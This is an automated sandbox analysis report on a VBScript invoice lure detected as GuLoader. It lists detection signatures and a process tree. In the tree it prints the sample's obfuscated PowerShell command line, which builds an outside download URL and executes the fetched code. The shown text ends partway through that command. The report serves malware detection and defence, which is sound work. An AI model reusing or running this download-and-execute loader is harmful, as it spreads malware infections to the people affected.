Edit tour
Windows
Analysis Report
INVOICE_DF76K.vbs
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Writes or reads registry keys via WMI
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6184 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\INVOI CE_DF76K.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - WmiPrvSE.exe (PID: 4432 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - powershell.exe (PID: 1600 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "If (${hos t}.Current UICulture) {$Afrikaa ns='SUBsTR ';$Semipro fanity26++ ;}$Afrikaa ns+='ing'; Function k onstruktiv e($Metalud lser){$Arb ejderneder laget=$Met aludlser.L ength-$Sem iprofanity 26;For( $O utlimn=4;$ Outlimn -l t $Arbejde rnederlage t;$Outlimn +=5){$junk ing+=$Meta ludlser.$A frikaans.' Invoke'( $Outlimn, $Semiprof anity26);} $junking;} function K reditorsel skabs($Pro grameksemp ler){ . ($Ecumen icalism) ( $Programek sempler);} $blyindhol ds=konstru ktive 'Atl aMimmooDia mz eneiAab elQuitlCas uaAu,i/ re s5,uma.Sea s0Uroc con (CuriW eve iEmainSu i dFiskoTele wS,odsPeng MedlN ,um TGale Bomb 1Cone0c.ff .Adj 0Incu ;pa.t Is,e WByggi.ndf nEffe6rel. 4 sp,;B.tt ,uggxGome 6Ency4 Unc ;Fuci Unha r Appv nch : uja1Semi 2Dayf1Opri .Solu0Awni )tr.l Etik GungieHeav cSmukkEnfo oTors/Skjo 2Tppe0Hall 1 Bio0Glid 0Batt1gast 0Sa,g1Osmi Do FSuggi Oplyr Skre Pachf Ando Bavixresc/ Mlk1for 2 Sort1Vris. Skum0Shel ';$Begazes =konstrukt ive 'Pr.sU A resEc ie S unrE.tl- SvamATevag Plo eF,ern .uvtFu d ';$Ideogra mmerne=kon struktive ' S,ahOver t InatUdjv pRestsByst :Fin /Fer, /Ma,taDiff dHugojNonr uSew,nLyte tMeloi Eft aStre.Must rDi.kuMu,i .For,cGil. oToilmS ur /P.rtwNeds pUnob-Gona iSnornKlim c FodlStyr uspard ,co eCystsSnek /Ga giSola m IntgB,op /,utsARets pTrempBroo lOmbyiO.sp a Ln.nHum. c Ge eHome sBlod.Makr sPe,rmBesk iGeni>Nat, hDe itDeca tBolspDees sspol:,upe /Inco/Unmo aL,esmRudd bMe ny Pen v Onoespad rSnd cTran eGr.n.Bac, cforloFors m med/Aute AShempJawf pFoehl C.r i Fe,asyrl n QuicAnst eA.iosBich .PennsPaab m Doli or ';$Toddysk es=konstru ktive 'A,u m> Tra ';$ Ecumenical ism=konstr uktive 'e asiK.lleDo mix ilr '; $Drsprkker nes='Nonnu tritiousne ss';$Telem estre = ko nstruktive 'Opsae Ov ec inrhl,t co Se, Con %Om raD.um psvvepAfst dHuipa Rat tHermaCel. % opn\Bogb SDiskpFril i BlisOad eK.llf Sne iinv skok, kUret.Prec P ,anuHarl r erb Fejl &Ta p&Hege Ky.ieNone c VedhI.ve oU,de Prot Li. ';Kre ditorselsk abs (konst ruktive 'I nde$ContgM a clUdelor egabRoseaA mbrl Gra:. iroaKalinL etvfMemblD igiyCituvK lapnAmniiG tefnFla,gV and=Genn(T urtcBlommO ctadSym, B eb/BicecA nni Un.e$N iteT Rh.eT ea.lB.dre Betm O.veF ortsSviptO rdlr An.eD r n)Unsl ' );Kreditor selskabs ( konstrukti ve 'Blan$F errg,uthlU .saoJejub, nigaC.rnlF ind:ResoVS nnec,annT riqaVingl, inenNoneeC ouns orfsS kif=Apos$P ostI ,aadR en,eSummoB arngPilar BanaDe.emA ,famFoure Skyr Syln SoaeMult. G,asBrdrpO marlIn.oi UdbtRadi(S ten$NapkTF jero ,ysdm ambdOveryS acesPcflkL ivieAktusA nt.)Strb ' );Kreditor selskabs ( konstrukti ve 'Frug[ iluNVejre P.utB.tr.F olkSStope MycrMarivE n,yiprfact raneArtiP O.soSammiJ ernnDicetN